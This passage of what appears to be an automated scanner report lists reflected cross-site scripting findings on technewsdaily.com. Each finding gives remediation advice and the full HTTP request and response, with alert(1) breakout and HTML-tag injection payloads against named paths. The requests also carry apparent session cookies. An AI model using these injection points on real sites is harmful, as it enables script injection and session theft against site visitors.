Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /next-google-phone-samsung-nexus-s-is-official-1754/?ea4ef'-alert(1)-'51f06504e6c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:32 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:32 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63044
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/?ea4ef'-alert(1)-'51f06504e6c=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.132. http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4938"><a>196e933abb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /next-google-phone-samsung-nexus-s-is-official-1754/?f4938"><a>196e933abb8=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:56:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:56:20 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 63406
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/next-google-phone-samsung-nexus-s-is-official-1754/?f4938"><a>196e933abb8=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload add07'-alert(1)-'05a3cfbc6c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /phone-chip-technology-std-diagnosis-1586add07'-alert(1)-'05a3cfbc6c4/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:24 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40478
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586add07'-alert(1)-'05a3cfbc6c4/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.134. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/phone-chip-technology-std-diagnosis-1586/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c48b0'-alert(1)-'3f8027afe8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /phone-chip-technology-std-diagnosis-1586/?c48b0'-alert(1)-'3f8027afe8b=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:12 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61418
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... cript type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/?c48b0'-alert(1)-'3f8027afe8b=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.135. http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.technewsdaily.com
Path:
/phone-chip-technology-std-diagnosis-1586/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25952"><a>fcc365c0685 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /phone-chip-technology-std-diagnosis-1586/?25952"><a>fcc365c0685=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:59 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:59 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61780
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/phone-chip-technology-std-diagnosis-1586/?25952"><a>fcc365c0685=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e603d'-alert(1)-'4f41bcc1c22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /play-video-games-without-the-console-with-onlive-1794e603d'-alert(1)-'4f41bcc1c22/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:55:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:55:03 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40504
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... "text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794e603d'-alert(1)-'4f41bcc1c22/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.137. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7cc92'-alert(1)-'99582f0ba3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /play-video-games-without-the-console-with-onlive-1794/?7cc92'-alert(1)-'99582f0ba3a=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:52 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:52 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68883
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... ext/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/?7cc92'-alert(1)-'99582f0ba3a=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.138. http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db8d9"><a>790bce3272c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /play-video-games-without-the-console-with-onlive-1794/?db8d9"><a>790bce3272c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:54:38 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:54:38 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 69245
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> <script type="text/javascript"> <!- ...[SNIP]... <link rel="canonical" src="http://www.technewsdaily.com/play-video-games-without-the-console-with-onlive-1794/?db8d9"><a>790bce3272c=1/" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bd8b'-alert(1)-'6487342d04e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy-policy8bd8b'-alert(1)-'6487342d04e/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:41 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40426
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/privacy-policy8bd8b'-alert(1)-'6487342d04e/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.140. http://www.technewsdaily.com/privacy-policy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/privacy-policy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff3c'-alert(1)-'e6b95dfdb2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy-policy/?6ff3c'-alert(1)-'e6b95dfdb2c=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:58:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:58:30 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46965
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/privacy-policy/?6ff3c'-alert(1)-'e6b95dfdb2c=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5bc'-alert(1)-'15f7bb1e4d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviewsff5bc'-alert(1)-'15f7bb1e4d6/ HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:14 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40412
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/reviewsff5bc'-alert(1)-'15f7bb1e4d6/",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.142. http://www.technewsdaily.com/reviews/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/reviews/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 842c5'-alert(1)-'3342d51a6d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /reviews/?842c5'-alert(1)-'3342d51a6d4=1 HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:53:08 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:53:09 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 160386
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/reviews/?842c5'-alert(1)-'3342d51a6d4=1",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cbac'-alert(1)-'820338cdb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /section1cbac'-alert(1)-'820338cdb/cool-gadgets HTTP/1.1 Host: www.technewsdaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: a5e04250348ef9239c1cdf4824f43ad1=f11qdbi5qb42ogt66ka0l8b2a7; __utmz=246794907.1292640389.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; __utma=246794907.255742026.1292640389.1292640389.1292640389.1; reaction_28=1; __utmc=246794907; __utmb=246794907.1.10.1292640389; __qca=P0-391693423-1292640388971;
Response
HTTP/1.1 200 OK Date: Sat, 18 Dec 2010 02:52:36 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: Zend Core/2.5.5 PHP/5.2.11 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sat, 18 Dec 2010 02:52:36 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 40432
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" > <head> <script type="text/javascript"> <!-- var ...[SNIP]... <script type="text/javascript"> setTimeout('COMSCORE.beacon({'+ 'c1:2,'+ 'c2:"6035753",'+ 'c3:"6035753",'+ 'c4:"http://www.technewsdaily.com/section1cbac'-alert(1)-'820338cdb/cool-gadgets",'+ 'c5:"Technology - News",'+ 'c6:"",'+ 'c15:""'+ '});',0); </script> ...[SNIP]...
1.144. http://www.technewsdaily.com/section/cool-gadgets [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.technewsdaily.com
Path:
/section/cool-gadgets
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 833d5'-alert(1)-'a846275ffde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
